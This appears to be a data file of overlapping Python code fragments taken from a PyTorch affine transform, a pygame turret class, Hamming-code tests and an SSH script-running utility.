"self.scale = Parameter(self.scale) def forward(self, x): return self.loc + self.scale * x def",
"torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor):",
"not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale =",
"return self.loc + self.scale * x def inverse(self, y): return (y - self.loc)",
"Parameter import torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not",
"= torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale = scale.float() self.n_dims = len(loc) if",
"= loc.float() self.scale = scale.float() self.n_dims = len(loc) if learnable: self.loc = Parameter(self.loc)",
"-1) if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale",
"= len(loc) if learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x):",
"class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc",
"from .transform import Transform from torch.nn import Parameter import torch class Affine(Transform): def",
"isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1,",
"torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1)",
"scale.float() self.n_dims = len(loc) if learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def",
"return (y - self.loc) / self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1) def",
"self.loc = loc.float() self.scale = scale.float() self.n_dims = len(loc) if learnable: self.loc =",
"self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x): return self.loc + self.scale",
"Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc =",
"self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1) def get_parameters(self): return {'type':'affine', 'loc':self.loc.detach().numpy(), 'scale':self.scale.detach().numpy()}",
"torch.nn import Parameter import torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__()",
"Transform from torch.nn import Parameter import torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0,",
"import Parameter import torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if",
"loc = torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc",
"forward(self, x): return self.loc + self.scale * x def inverse(self, y): return (y",
"= Parameter(self.scale) def forward(self, x): return self.loc + self.scale * x def inverse(self,",
"torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale = scale.float() self.n_dims =",
"= Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x): return self.loc + self.scale *",
"y): return (y - self.loc) / self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1)",
"scale = torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale = scale.float() self.n_dims = len(loc)",
"-1) self.loc = loc.float() self.scale = scale.float() self.n_dims = len(loc) if learnable: self.loc",
"self.n_dims = len(loc) if learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self,",
"= scale.float() self.n_dims = len(loc) if learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale)",
"super().__init__() if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor):",
"def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1,",
"def forward(self, x): return self.loc + self.scale * x def inverse(self, y): return",
"x def inverse(self, y): return (y - self.loc) / self.scale def log_abs_det_jacobian(self, x,",
"Parameter(self.scale) def forward(self, x): return self.loc + self.scale * x def inverse(self, y):",
"self.loc + self.scale * x def inverse(self, y): return (y - self.loc) /",
"def inverse(self, y): return (y - self.loc) / self.scale def log_abs_det_jacobian(self, x, y):"
] |
[
"def getLocation(self): return (self.x, self.y) def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1]",
"getSprite(self): return self.sprite def setX(self, x): self.x = x def getX(self): return self.x",
"(self.x, self.y) def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self,",
"def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls",
"self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x = 0",
"setY(self, y): self.y = y def getY(self): return self.y def getSize(self): return self.size",
"return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls = MovementControls",
"def getSize(self): return self.size def getLocation(self): return (self.x, self.y) def getRect(self): return pygame.Rect(",
"scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return",
"self.size = (spriteRect.width, spriteRect.height) self.x = 0 self.y = 0 self.movementControls = MovementControls",
"self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size",
"class Turret: def __init__(self, MovementControls): self.speed = 40 self.lives = 3 self.score =",
"self.movementControls = MovementControls def getScore(self): return self.score def setScore(self, score): self.score = score",
"negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return self.lives def setLives(self, lives): self.lives =",
"def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return self.lives def setLives(self, lives):",
"self.y = 0 self.movementControls = MovementControls def getScore(self): return self.score def setScore(self, score):",
"def addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def",
"0 self.y = 0 self.movementControls = MovementControls def getScore(self): return self.score def setScore(self,",
"= 40 self.lives = 3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite =",
"+= scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return self.lives def",
"= y def getY(self): return self.y def getSize(self): return self.size def getLocation(self): return",
"self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height)",
"addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self):",
"return self.sprite def setX(self, x): self.x = x def getX(self): return self.x def",
"setX(self, x): self.x = x def getX(self): return self.x def setY(self, y): self.y",
"= 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size =",
"self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls = MovementControls def getMovementControls(self): return",
"\"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x =",
"score def addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta",
"= \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x",
"0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width,",
"= MovementControls def getScore(self): return self.score def setScore(self, score): self.score = score def",
"def __init__(self, MovementControls): self.speed = 40 self.lives = 3 self.score = 0 self.spriteImage",
"= score def addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score -=",
"return self.lives def setLives(self, lives): self.lives = lives def getSprite(self): return self.sprite def",
"pygame class Turret: def __init__(self, MovementControls): self.speed = 40 self.lives = 3 self.score",
"= self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x = 0 self.y = 0 self.movementControls",
"spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x = 0 self.y = 0",
"return (self.x, self.y) def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def",
"self.score = score def addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score",
"self.score += scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return self.lives",
"def setLives(self, lives): self.lives = lives def getSprite(self): return self.sprite def setX(self, x):",
"self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls = MovementControls def getMovementControls(self):",
"MovementControls): self.speed = 40 self.lives = 3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\"",
"y): self.y = y def getY(self): return self.y def getSize(self): return self.size def",
"def setScore(self, score): self.score = score def addScore(self, scoreDelta): self.score += scoreDelta def",
"self.y def getSize(self): return self.size def getLocation(self): return (self.x, self.y) def getRect(self): return",
"def setY(self, y): self.y = y def getY(self): return self.y def getSize(self): return",
"pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x = 0 self.y =",
"self.speed = 40 self.lives = 3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite",
"getScore(self): return self.score def setScore(self, score): self.score = score def addScore(self, scoreDelta): self.score",
"__init__(self, MovementControls): self.speed = 40 self.lives = 3 self.score = 0 self.spriteImage =",
"MovementControls def getScore(self): return self.score def setScore(self, score): self.score = score def addScore(self,",
"def getLives(self): return self.lives def setLives(self, lives): self.lives = lives def getSprite(self): return",
"0 self.movementControls = MovementControls def getScore(self): return self.score def setScore(self, score): self.score =",
"setLives(self, lives): self.lives = lives def getSprite(self): return self.sprite def setX(self, x): self.x",
"self.lives = 3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect",
"(spriteRect.width, spriteRect.height) self.x = 0 self.y = 0 self.movementControls = MovementControls def getScore(self):",
"= 0 self.movementControls = MovementControls def getScore(self): return self.score def setScore(self, score): self.score",
"getLocation(self): return (self.x, self.y) def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] )",
"self.lives = lives def getSprite(self): return self.sprite def setX(self, x): self.x = x",
"spriteRect.height) self.x = 0 self.y = 0 self.movementControls = MovementControls def getScore(self): return",
"= lives def getSprite(self): return self.sprite def setX(self, x): self.x = x def",
"= 0 self.y = 0 self.movementControls = MovementControls def getScore(self): return self.score def",
"self.sprite def setX(self, x): self.x = x def getX(self): return self.x def setY(self,",
"lives def getSprite(self): return self.sprite def setX(self, x): self.x = x def getX(self):",
"getY(self): return self.y def getSize(self): return self.size def getLocation(self): return (self.x, self.y) def",
"def setX(self, x): self.x = x def getX(self): return self.x def setY(self, y):",
"self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x = 0 self.y = 0 self.movementControls =",
"getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls =",
"self.y = y def getY(self): return self.y def getSize(self): return self.size def getLocation(self):",
"self.score def setScore(self, score): self.score = score def addScore(self, scoreDelta): self.score += scoreDelta",
"<gh_stars>0 import pygame class Turret: def __init__(self, MovementControls): self.speed = 40 self.lives =",
"def getSprite(self): return self.sprite def setX(self, x): self.x = x def getX(self): return",
"def getY(self): return self.y def getSize(self): return self.size def getLocation(self): return (self.x, self.y)",
"self.y) def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls):",
"= (spriteRect.width, spriteRect.height) self.x = 0 self.y = 0 self.movementControls = MovementControls def",
"40 self.lives = 3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage)",
"getLives(self): return self.lives def setLives(self, lives): self.lives = lives def getSprite(self): return self.sprite",
"x): self.x = x def getX(self): return self.x def setY(self, y): self.y =",
"return self.score def setScore(self, score): self.score = score def addScore(self, scoreDelta): self.score +=",
"x def getX(self): return self.x def setY(self, y): self.y = y def getY(self):",
"= pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect() self.size = (spriteRect.width, spriteRect.height) self.x = 0 self.y",
"self.size def getLocation(self): return (self.x, self.y) def getRect(self): return pygame.Rect( self.x, self.y, self.getSize()[0],",
"removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return self.lives def setLives(self, lives): self.lives",
"= 3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect =",
"3 self.score = 0 self.spriteImage = \"assets/sprites/turret/shooter.png\" self.sprite = pygame.image.load(self.spriteImage) spriteRect = self.sprite.get_rect()",
"setScore(self, score): self.score = score def addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self,",
"self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls = MovementControls def getMovementControls(self): return self.movementControls",
"self.x def setY(self, y): self.y = y def getY(self): return self.y def getSize(self):",
"return self.x def setY(self, y): self.y = y def getY(self): return self.y def",
"return self.y def getSize(self): return self.size def getLocation(self): return (self.x, self.y) def getRect(self):",
"getSize(self): return self.size def getLocation(self): return (self.x, self.y) def getRect(self): return pygame.Rect( self.x,",
"-= negativeScoreDelta def getLives(self): return self.lives def setLives(self, lives): self.lives = lives def",
"self.x = 0 self.y = 0 self.movementControls = MovementControls def getScore(self): return self.score",
"lives): self.lives = lives def getSprite(self): return self.sprite def setX(self, x): self.x =",
"self.x = x def getX(self): return self.x def setY(self, y): self.y = y",
"negativeScoreDelta def getLives(self): return self.lives def setLives(self, lives): self.lives = lives def getSprite(self):",
"self.score -= negativeScoreDelta def getLives(self): return self.lives def setLives(self, lives): self.lives = lives",
"scoreDelta def removeScore(self, negativeScoreDelta): self.score -= negativeScoreDelta def getLives(self): return self.lives def setLives(self,",
"getX(self): return self.x def setY(self, y): self.y = y def getY(self): return self.y",
"= x def getX(self): return self.x def setY(self, y): self.y = y def",
"y def getY(self): return self.y def getSize(self): return self.size def getLocation(self): return (self.x,",
"Turret: def __init__(self, MovementControls): self.speed = 40 self.lives = 3 self.score = 0",
"self.lives def setLives(self, lives): self.lives = lives def getSprite(self): return self.sprite def setX(self,",
"import pygame class Turret: def __init__(self, MovementControls): self.speed = 40 self.lives = 3",
"def getX(self): return self.x def setY(self, y): self.y = y def getY(self): return",
"def getScore(self): return self.score def setScore(self, score): self.score = score def addScore(self, scoreDelta):",
"return self.size def getLocation(self): return (self.x, self.y) def getRect(self): return pygame.Rect( self.x, self.y,",
"score): self.score = score def addScore(self, scoreDelta): self.score += scoreDelta def removeScore(self, negativeScoreDelta):",
"pygame.Rect( self.x, self.y, self.getSize()[0], self.getSize()[1] ) def setMovementControls(self, MovementControls): self.movementControls = MovementControls def"
] |
[
"Lines 5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys",
"\"\"\" END \"\"\" import main as program import pytest def test_example(): \"\"\" From",
"as program import pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\"",
"'..') \"\"\" END \"\"\" import main as program import pytest def test_example(): \"\"\"",
"7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3)",
"01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH =",
"and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..')",
"def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H",
"From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes",
"H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert vH == [0,1,1]",
"\"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3)",
"sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import pytest def",
"<reponame>Alasdair-Macindoe/HammingCodes<gh_stars>0 \"\"\" Lines 5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\"",
"import pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v =",
"http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program",
"import main as program import pytest def test_example(): \"\"\" From Lecture 7 -",
"import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import pytest",
"END \"\"\" import main as program import pytest def test_example(): \"\"\" From Lecture",
"6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\"",
"from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import",
"5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0,",
"program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert vH ==",
"program import pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v",
"were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END",
"\"\"\" Lines 5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import",
"\"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H)",
"v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert",
"SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main",
"adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\"",
"= program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert vH",
"- 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH",
"Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes =",
"test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H =",
"\"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import",
"pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]])",
"main as program import pytest def test_example(): \"\"\" From Lecture 7 - 01",
"code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as",
"\"\"\" import main as program import pytest def test_example(): \"\"\" From Lecture 7",
"sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import pytest def test_example():"
] |
[
"i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands",
"Exception as e: e.args += ('When running bash script \"%s\"' % command), raise",
"err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename,",
"out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename,",
"parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed",
"stdout, output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8') if segment",
"e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try:",
"= self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command =",
"command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait",
"= os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename =",
"finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base +",
"err_filename = random_base + \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([",
"\".out\" err_filename = random_base + \".err\" status_filename = random_base + \".retcode\" command =",
"{completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally:",
"stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status !=",
"* 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script,",
"self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return",
"or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script,",
"echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir,",
"random_base + \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh",
"stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close()",
"import background, parallel import tempfile import os import subprocess from subprocess import CalledProcessError",
"bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs =",
"\"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"])",
"stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close()",
"command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base",
"scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running",
"chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status =",
"base_dir) except Exception as e: e.args += ('When running bash script \"%s\"' %",
"status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (scripts,",
"import tempfile import os import subprocess from subprocess import CalledProcessError class Run(object): def",
"raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename,",
"raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename",
"status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\"",
"= logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self,",
"transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1)",
"chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise",
"\" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir,",
"transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command)",
"return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command)",
"failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr)",
"--no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts,",
"0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode,",
"subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\",",
"transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status",
"joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd",
"except Exception as e: e.args += ('When running bash script \"%s\"' % command),",
"\"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename))",
"tempfile import os import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self,",
"0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir,",
"\"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"])",
"output was\\n:%s\" % ( output_timeout, output)) e.output = output raise e return \"\".join(output_array)",
"completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try:",
"status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >&",
"tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\")",
"60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\",",
"stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error",
"output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input",
"was\\n:%s\" % ( output_timeout, output)) e.output = output raise e return \"\".join(output_array) def",
"from automation_infra.plugins import background, parallel import tempfile import os import subprocess from subprocess",
"_parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s",
"status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands",
"$!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command)",
"return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script))",
"chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8')",
"try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" %",
"<< 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" %",
"= \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir)",
